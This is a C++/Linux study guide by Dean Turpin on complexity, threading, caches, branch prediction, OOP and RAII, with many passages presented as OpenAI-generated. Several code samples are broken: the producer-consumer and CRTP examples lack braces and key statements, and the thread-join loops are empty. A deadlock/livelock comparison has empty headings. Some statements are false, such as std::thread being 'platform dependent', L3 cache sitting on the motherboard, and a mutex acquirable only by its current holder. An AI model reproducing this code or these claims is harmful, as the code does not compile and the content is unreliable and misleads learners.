Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Tue Feb 27 05:04:51 UTC 2024


An ode to C++

Let’s start with a haiku written by a computer.

Lines of code abound,
Semicolons and brackets,
C++, oh so complex.

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.

OpenAI generated interview questions

  1. What is the difference between a stack and a queue data structure?

  2. Explain the concept of recursion and provide an example of when it would be useful in a programming solution.

  3. How does a hash table work and what are its advantages compared to other data structures?

  4. Describe the difference between a binary search tree and a binary heap.

  5. Can you explain the concept of polymorphism in object-oriented programming and provide an example of its implementation?

  6. What is the difference between pass by value and pass by reference in C++?

  7. How is memory allocated and deallocated in C++?

  8. What is the difference between a pointer and a reference in C++?

  9. What is the difference between a class and a struct in C++?

  10. Can you explain the concept of polymorphism in C++?


You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description Examples
O(1) Constant time Accessing an element in an array, adding or removing a node from a linked list
O(log n) Logarithmic time Binary search, divide and conquer algorithms
O(n) Linear time Iterating through an array or linked list
O(n^2) Quadratic time Nested loops, bubble sort
O(n log n) Linearithmic time Merge sort, quicksort
O(n^c) Polynomial time Nested loops with a constant number of iterations
O(c^n) Exponential time Recursive algorithms with a constant base
O(n!) Factorial time Permutation algorithms

Comparing two fundamental data structures

Linked lists and arrays are two common types of data structures used in computer programming. Both have their own advantages and disadvantages, and the choice between the two often depends on the specific needs of the program. One important aspect to consider when comparing these two data structures is their average complexity, which refers to the efficiency of operations such as insertion, deletion, and access.

The average complexity of linked lists and arrays can vary depending on the type of operation and the specific implementation. However, generally speaking, arrays tend to have better average complexity for access operations, while linked lists have better average complexity for insertion and deletion operations.

For arrays, the average complexity for accessing an element is O(1), meaning it takes constant time regardless of the size of the array. This is because arrays have a fixed size and elements are stored contiguously in memory, making it easy to access them using their index. However, the average complexity for insertion and deletion operations is O(n), meaning it takes linear time proportional to the size of the array. This is because when an element is inserted or deleted in the middle of the array, all the elements after it have to be shifted to accommodate the change.

On the other hand, linked lists have an average complexity of O(n) for accessing elements. This is because linked lists store elements in nodes, and to access a specific element, the program must traverse through all the nodes until it reaches the desired element. However, the average complexity for insertion and deletion operations in linked lists is O(1), meaning it takes constant time regardless of the size of the linked list. This is because only the pointers of the affected nodes need to be updated, rather than shifting the entire list like in arrays.

In summary, the average complexity of linked lists and arrays can be compared as follows: - For access operations, arrays have a better average complexity of O(1) compared to O(n) for linked lists. - For insertion and deletion operations, linked lists have a better average complexity of O(1) compared to O(n) for arrays.

Overall, the choice between linked lists and arrays depends on the specific needs of the program. If fast access to elements is the main requirement, arrays would be a better choice. However, if efficient insertion and deletion operations are more important, linked lists would be a better option.

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread


Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine destroy the future and the exception is rethrown by the calling get() routine. You ought to pass it a strategy: std::launch::async or std::launch::deferred as a first parameter.


You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.


Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources


A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but also I think it expresses intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>

using namespace std;

queue<int> buffer;
mutex mtx;
condition_variable cv;

void producer(int num) {
    for (int i = 1; i <= num; i++) {
        unique_lock<mutex> lck(mtx);
        cout << \"Produced: \" << i << endl;
        this_thread::sleep_for(chrono::milliseconds(500)); // Sleep for 500 milliseconds

void consumer(int num) {
    for (int i = 1; i <= num; i++) {
        unique_lock<mutex> lck(mtx);
        while (buffer.empty()) {
        int data = buffer.front();
        cout << \"Consumed: \" << data << endl;
        this_thread::sleep_for(chrono::milliseconds(500)); // Sleep for 500 milliseconds

int main() {
    int num_producers = 5; // Number of producer threads
    int num_consumers = 10; // Number of consumer threads
    thread producers[num_producers];
    thread consumers[num_consumers];

    // Create producer threads
    for (int i = 0; i < num_producers; i++) {
        producers[i] = thread(producer, 10); // Each producer produces 10 items

    // Create consumer threads
    for (int i = 0; i < num_consumers; i++) {
        consumers[i] = thread(consumer, 10); // Each consumer consumes 10 items

    // Join producer threads
    for (int i = 0; i < num_producers; i++) {

    // Join consumer threads
    for (int i = 0; i < num_consumers; i++) {

    return 0;


A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order”.

OpenAI: _ Processor caches are small, high-speed memory units located on the processor chip or very close to it. They are used to temporarily store frequently accessed data and instructions, allowing the processor to access them quickly instead of retrieving them from the slower main memory.

There are three main types of processor caches: L1, L2, and L3.

  1. L1 Cache: This is the smallest and fastest cache, located closest to the processor core. It is divided into two parts - L1 instruction cache and L1 data cache. The instruction cache stores instructions that the processor will execute, while the data cache holds data that the processor is currently working on. The size of L1 cache can range from 8KB to 64KB.

  2. L2 Cache: This cache is larger than L1 and is usually located on the same chip as the processor. It acts as a middle layer between the L1 cache and the main memory. It stores data that is frequently accessed by the processor but not as frequently as the data in the L1 cache. The size of L2 cache can range from 256KB to 512KB.

  3. L3 Cache: This is the largest cache and is usually located on the motherboard. It acts as a shared cache for all the cores in a multi-core processor, allowing them to access frequently used data quickly. The size of L3 cache can range from 4MB to 16MB.

The main function of processor caches is to improve the overall performance of the system by reducing the time it takes for the processor to access data and instructions. This is achieved through the principle of "temporal locality," which states that data and instructions that have been recently accessed are likely to be accessed again in the near future. Thus, storing them in the cache allows for faster retrieval, as opposed to accessing them from the main memory.

In addition to improving performance, processor caches also help reduce power consumption by allowing the processor to access frequently used data and instructions without having to constantly access the slower main memory.

Overall, processor caches play a crucial role in ensuring that the processor can efficiently execute instructions and process data, making them an essential component of modern computer systems. _

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: _ Cache coherence is a mechanism used in multi-processor systems to ensure that the data stored in the multiple caches across different processors is consistent and up-to-date. It ensures that all processors have a consistent view of the shared data in the system.

In a multi-processor system, each processor has its own cache memory that stores recently accessed data from main memory. When a processor needs to access a particular data, it first checks its own cache. If the data is not found in the cache, it is fetched from main memory and stored in the cache for future use.

However, this can lead to a problem known as cache inconsistency. If one processor modifies a data in its cache, the other processors will still have the old version of the data in their caches. This can lead to incorrect data being accessed by the processors, resulting in errors and system instability.

Cache coherence solves this problem by maintaining consistency among the caches. This is achieved through a set of protocols and mechanisms that ensure all processors have the most updated version of the shared data. These protocols include snooping, where each processor monitors the bus for any changes made to the shared data, and invalidation, where a processor signals to other processors that it has modified a particular data and they need to invalidate their copies.

Cache coherence is essential for the efficient and reliable operation of multi-processor systems. It ensures data integrity and consistency, and allows for seamless sharing of data among processors. _

MESI cache coherence protocol

Each cache line has state, tag, data.


See bus snooping.

Directory based coherence

Used for large CPUs.

See wiki.

Write-back versus write-through

All Intel-compatible CPUs during the last one/two decades used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory, reality is slightly more complex than that.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: _ Cache misses occur when the processor attempts to access data or instructions that are not currently stored in the cache memory. This means that the requested data must be retrieved from a slower, larger memory location, such as main memory, before it can be used by the processor. This delay in accessing the data can result in slower performance and can impact the overall efficiency of the system.

Cache misses can be caused by a variety of factors, such as:

  1. Initial access: When a program is first executed, its instructions and data are not yet stored in the cache. This means that the processor must access them from main memory, resulting in a cache miss.

  2. Conflicting data: If multiple programs or processes are accessing the same data, it may cause cache misses as the data is constantly being evicted and reloaded into the cache.

  3. Cache size limitations: If the cache is too small to hold all the frequently used data, it may result in frequent cache misses as data is constantly being evicted and reloaded into the cache.

  4. Eviction policies: The way in which the cache decides which data to evict can also impact cache misses. If the eviction policy is not efficient, it may result in frequently evicting important data and causing cache misses.

Cache misses can have a significant impact on the overall performance of a system. They can result in slower execution times, increased latency, and reduced efficiency. To improve performance and reduce cache misses, techniques such as increasing cache size, optimizing eviction policies, and using prefetching can be implemented. _

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.


The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

// Base class template using CRTP
template<typename Derived>
class Base {
    void foo() {

// Derived class using CRTP
class Derived : public Base<Derived> {
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;

Cache performance evaluate

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.


Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

CPI_stall contributors

Cache locality

Cache locality refers to the principle of storing frequently used data in a cache, which is a smaller and faster memory closer to the processor, in order to improve performance. It is based on the observation that programs tend to access a relatively small portion of memory at any given time, and that this portion of memory is often accessed repeatedly. By storing this frequently used data in a cache, the processor can access it more quickly, thereby reducing the time it takes to retrieve data from main memory.

Cache locality can be further classified into two types: temporal and spatial locality. Temporal locality refers to the reuse of the same data or instructions within a short period of time. This is often seen in loops and repetitive tasks, where the same data is accessed multiple times. Spatial locality, on the other hand, refers to the tendency of programs to access data that is close to previously accessed data. This is often seen in sequential data structures, such as arrays, where the next element is likely to be accessed after the previous one.

In addition to improving performance, cache locality also helps reduce the overall memory access time and energy consumption, as the processor does not have to retrieve data from slower main memory as frequently. It is an important consideration in computer architecture and is often used in designing efficient cache memory systems.

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI: _ Translation lookaside buffer (TLB) is a cache memory that stores recently used virtual-to-physical address translations in a computer system. It is used to improve the performance of virtual memory management by reducing the time it takes to access physical memory.

When a program accesses a virtual memory address, the CPU first checks the TLB to see if the translation for that address is already stored. If it is, the CPU can quickly retrieve the corresponding physical address and access the data in physical memory. This process is known as a TLB hit.

If the translation is not found in the TLB, it is known as a TLB miss. In this case, the CPU must access the page table in main memory to retrieve the translation, which takes longer and slows down the overall performance. The TLB is designed to be small and fast, so it can only store a limited number of translations.

The TLB is typically managed by the operating system, which constantly updates it with the most frequently used translations. This helps to minimize the number of TLB misses and improve overall system performance. However, if the TLB becomes full, it may need to be flushed and reloaded with a new set of translations, which can temporarily slow down the system.

Overall, the TLB plays a crucial role in virtual memory management, helping to reduce the access time to physical memory and improve the overall performance of a computer system. _

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];
// The writer threads update non-atomic shared data 
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);
// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
        // synchronize with just one writer
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading


Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;

Branch prediction

In summary, branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: _ Branch prediction is a technique used in computer processors to improve the efficiency of executing instructions. It involves predicting the outcome of a conditional branch instruction (such as an if statement) and pre-loading the instructions that are likely to be executed next. This allows the processor to start executing those instructions without waiting for the conditional branch instruction to be evaluated, which can save time and improve performance.

The prediction is based on past behavior and patterns of the program’s execution. For example, if a branch instruction has always evaluated to true in the past, the processor will predict that it will continue to evaluate to true and load the instructions accordingly. If the prediction is correct, the processor can continue executing without any delay. However, if the prediction is incorrect, the processor will have to discard the pre-loaded instructions and start executing the correct instructions, which can result in a slight performance penalty.

There are two main types of branch prediction techniques: static and dynamic. Static branch prediction uses heuristics to make a prediction based on the structure of the program, while dynamic branch prediction uses information gathered at runtime to make more accurate predictions.

Branch prediction has become an essential technique in modern processors as it allows for faster execution of code and improves overall performance. It is especially useful in applications with a lot of conditional statements, such as loops and if-else statements, as it can significantly reduce the number of cycles needed to execute the program. _

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.


The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence




When should you use waterfall methodology?



What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.



Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit

Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that is based on the concept of objects, which can contain data and code, and interact with one another. It is a way of organizing and designing code in a more intuitive and modular manner, making it easier to maintain and modify.

In OOP, objects have properties (attributes) and behaviors (methods). Objects can also have relationships with one another, such as inheritance and composition, which allow for code reuse and abstraction.

Some key principles of OOP include encapsulation, abstraction, inheritance, and polymorphism. Encapsulation refers to the concept of bundling data and methods within an object, so that they can only be accessed and modified through the object’s interface. Abstraction is the process of hiding the implementation details of an object and only exposing its essential features. Inheritance allows objects to inherit characteristics and behaviors from a parent object, promoting code reuse. Polymorphism refers to the ability of objects to take on different forms and behave differently based on the context in which they are used.

Overall, object-oriented programming provides a more organized and flexible approach to coding, making it easier to manage and scale complex software systems. It is widely used in many programming languages, including Java, C++, and Python.


  1. Ad-hoc Polymorphism: Also known as function overloading, ad-hoc polymorphism refers to the ability to use the same function name for different functions with different parameter types or number of parameters. This allows for more flexibility in code design and makes it easier to create functions that perform similar tasks but on different data types.

  2. Parametric Polymorphism: This type of polymorphism allows for the use of generic data types in a function or class, making it possible to handle different data types without explicitly specifying them. This is useful for creating data structures and algorithms that can work with different types of data.

  3. Subtype Polymorphism: Also known as inheritance polymorphism, subtype polymorphism refers to the ability to use objects of a derived class in place of objects of a parent class. This allows for code reusability and makes it easier to create and maintain complex class hierarchies.

  4. Coercion Polymorphism: This type of polymorphism refers to the automatic conversion of data types in order to perform an operation. For example, in a language with coercion polymorphism, an integer may be automatically converted to a float if needed for a mathematical operation.

  5. Interface Polymorphism: This type of polymorphism allows for the use of different objects that implement the same interface, allowing for more flexibility in code design. This is commonly used in languages with interfaces, such as Java.

  6. Inclusion Polymorphism: Also known as subtype polymorphism, inclusion polymorphism refers to the ability to treat an object of a derived class as an object of its parent class. This allows for code reusability and simplifies the handling of complex class hierarchies.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.


RAII stands for Resource Acquisition Is Initialization. It is a programming technique used in languages such as C++ to manage resources in a safe and efficient manner. The basic idea behind RAII is that the acquisition of a resource (such as memory or a file handle) is tied to the initialization of an object, and the release of the resource is tied to the destruction of that object.

In practice, this means that when an object is created, it automatically acquires the necessary resources and when the object is destroyed, the resources are automatically released. This ensures that the resources are always properly managed, even in the case of exceptions or unexpected control flow.

RAII makes use of the concept of constructors and destructors in object-oriented programming. The constructor of an object is responsible for acquiring the necessary resources, and the destructor is responsible for releasing them. This makes the code more readable and maintainable, as resource management is handled by the object itself rather than scattered throughout the code.

RAII is considered a best practice in C++ and is widely used in libraries and frameworks. It helps to prevent memory leaks, dangling pointers, and other common errors related to resource management. By using RAII, developers can write more robust and efficient code, with less risk of bugs and memory issues.


Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.


A routine can be described as reentrant if it can be interrupted without an not leave the operation partially complete: the invariants remain true.


A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants refer to properties or conditions that remain the same throughout a process or system, regardless of any changes or operations that occur. In other words, they are characteristics that are always true or fixed under a given set of circumstances.

In computer science, invariants are often used to describe properties of data structures, algorithms, or programs. They can also be used to define requirements for a system to function correctly.

There are two main types of invariants: logical and mathematical. Logical invariants refer to properties that are true at all times, such as the order of elements in a data structure. Mathematical invariants, on the other hand, are based on mathematical relationships and are used to prove the correctness of an algorithm or program.

Invariants are important in software engineering as they help ensure the correctness of a system and can also serve as a form of documentation. They can also aid in debugging and troubleshooting, as any changes that violate the invariants can be identified as a potential source of errors.

In addition to computer science, invariants can also be found in other fields such as physics, engineering, and mathematics. In these contexts, invariants refer to properties that remain constant under certain transformations or operations.

Overall, invariants play a critical role in ensuring the stability and reliability of systems and processes, and are an important concept to understand in various disciplines.


A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome of a system or program is dependent on the timing or sequence of events, and the result may be different depending on the order in which these events occur. This can lead to unexpected or incorrect behavior of the system, and is often caused by multiple processes or threads accessing shared resources.

One common example of a race condition is when two threads or processes try to access and modify the same variable or data at the same time. The result of this race depends on which thread or process is able to access the data first, and the other may end up with outdated or incorrect information.

Another example is when two processes try to write to the same file simultaneously. Depending on the timing of the write operations, the contents of the file may end up being a combination of both processes’ data, leading to data corruption.

Race conditions can also occur in systems where multiple users are accessing shared resources, such as a database. If two users try to modify the same data at the same time, the result may be inconsistent or incorrect data being stored in the database.

In some cases, race conditions can also lead to security vulnerabilities. For example, if a user is able to access and modify a shared resource at the same time as another user, they may be able to access sensitive information or change the behavior of the system in unintended ways.

To prevent race conditions, programmers must carefully design and implement their code to handle multiple processes and threads accessing shared resources. This can involve using synchronization mechanisms, such as locks or semaphores, to ensure that only one process or thread can access a resource at a time. It is also important to properly handle and manage exceptions and error conditions that may arise from race conditions.


Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.

OpenAI: Deadlocks and livelocks are both types of concurrency issues that can occur in a multi-threaded environment. They both involve situations where two or more threads are unable to make progress, but they differ in their causes and behaviors.

  1. Definition:
  1. Cause:
  1. Behavior:
  1. Resolution:
  1. Prevention:

In summary, both deadlocks and livelocks can cause serious issues in a multi-threaded system, but they have different causes and behaviors. Deadlocks result in a complete system freeze, while livelocks lead to a high CPU usage. They can be resolved and prevented by using different techniques.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI: 1. Use a deadlock prevention algorithm: There are various algorithms such as the Banker’s algorithm and the Wait-Die algorithm that can be implemented to prevent deadlocks from occurring.

  1. Implement a timeout mechanism: Set a timeout for each process so that if it does not complete its task within a certain time frame, it will release its resources and try again later. This can prevent a deadlock from occurring if one process is waiting for resources that are held by another process.

  2. Avoid circular wait: One of the necessary conditions for a deadlock to occur is circular wait, where each process is waiting for a resource held by another process. To avoid this, assign a unique numerical identifier to each resource and ensure that processes always request resources in increasing order.

  3. Use resource ordering: If a resource can only be held by one process at a time, then assign a specific order in which processes can request and acquire resources. This can prevent the circular wait condition from being met.

  4. Release resources in a timely manner: Once a process has finished using a resource, it should release it as soon as possible. This will make the resource available for other processes to use and reduce the likelihood of a deadlock occurring.

  5. Use a resource manager: A resource manager can help to coordinate resource allocation and ensure that resources are not over-allocated, which can lead to deadlocks.

  6. Monitor and detect deadlocks: Implement a deadlock detection algorithm that can identify when a deadlock has occurred. This can allow for timely intervention to resolve the deadlock.

  7. Limit resource allocation: Set limits on the maximum number of resources that can be allocated to a process. This can prevent one process from monopolizing resources and causing a deadlock.

  8. Design systems with fewer shared resources: The more resources that are shared between processes, the higher the chances of a deadlock occurring. Designing systems with fewer shared resources can reduce the likelihood of a deadlock.

  9. Test and debug code: Proper testing and debugging can help identify and fix potential deadlocks before they occur in a production environment.

See also


Synchronising threads

OpenAI: Mutex: 1. Usage: Mutex is used to provide mutual exclusion, meaning only one thread can access a shared resource at a time. 2. Functionality: Mutex locks a resource when a thread accesses it and unlocks the resource when the thread is done. This ensures that only one thread can access the resource at a time, preventing race conditions and data corruption. 3. Implementation: Mutex is typically implemented as a flag that is set when a thread acquires the resource and cleared when the thread releases it. 4. Ownership: Mutex can only be acquired by the thread that currently holds it. If another thread tries to acquire the mutex, it will have to wait until the current thread releases the mutex. 5. Usage in multithreaded environments: Mutex is commonly used in multithreaded environments to ensure thread safety and prevent data corruption.

Semaphore: 1. Usage: Semaphore is used to control access to a shared resource by limiting the number of threads that can access it at a given time. 2. Functionality: Semaphore maintains a counter that tracks the number of threads currently accessing the resource. When a thread requests access to the resource, the counter is decremented. When the thread is done, the counter is incremented again. 3. Implementation: Semaphore is typically implemented as a variable that can be accessed and modified atomically. 4. Ownership: Unlike mutex, semaphore can be acquired by any thread that requests it, as long as the maximum number of threads allowed by the semaphore has not been reached. 5. Usage in multithreaded environments: Semaphore is commonly used in multithreaded environments to control access to shared resources and limit the number of threads that can access them. This can help improve performance by preventing too many threads from accessing the resource at the same time.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.


Threads and processes are both units of execution in a computer system, but they have some key differences. Both threads and processes have their own distinct advantages and uses, which make them important in different scenarios.

  1. Definition: A thread is a single sequence of execution within a process. It is also known as a lightweight process, as it shares the same address space and system resources with other threads in the same process. On the other hand, a process is an instance of a program that is being executed. It has its own memory space and system resources, and can consist of multiple threads.

  2. Resource Usage: Threads within a process share the same resources, such as memory, files, and I/O devices. This makes thread creation and context switching faster and more efficient. Processes, on the other hand, have their own separate resources and require more time and overhead for creation and context switching.

  3. Communication and Synchronization: Threads within a process can communicate with each other through shared memory, making it easier to share data and resources. However, this also means that proper synchronization mechanisms need to be in place to avoid conflicts. Processes, on the other hand, have their own separate memory space and communicate through inter-process communication mechanisms, which are more complex and slower than thread communication.

  4. Concurrency: Threads within a process can run concurrently on multiple CPU cores, making use of parallel processing. However, due to shared resources, improper synchronization can lead to race conditions and other concurrency issues. Processes, on the other hand, have their own separate memory space and can only run concurrently on different CPU cores, not within the same core.

  5. Fault Isolation: Since threads within a process share the same resources, a bug in one thread can affect the entire process, causing it to crash. Processes, on the other hand, have their own separate memory space, so a bug in one process will not affect other processes.

  6. Creation and Termination: Creating and terminating threads is faster and less resource-intensive compared to processes. This makes threads more suitable for lightweight tasks that require frequent creation and termination. Processes, on the other hand, require more time and resources for creation and termination, making them more suitable for heavier tasks that require longer execution times.

In summary, threads and processes have their own distinct purposes and uses, and the choice between them depends on the specific requirements of the task at hand. Threads are more efficient for tasks that require frequent creation and communication, while processes are more suitable for heavy and long-running tasks that require isolation and fault tolerance.

Thread bests practice


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
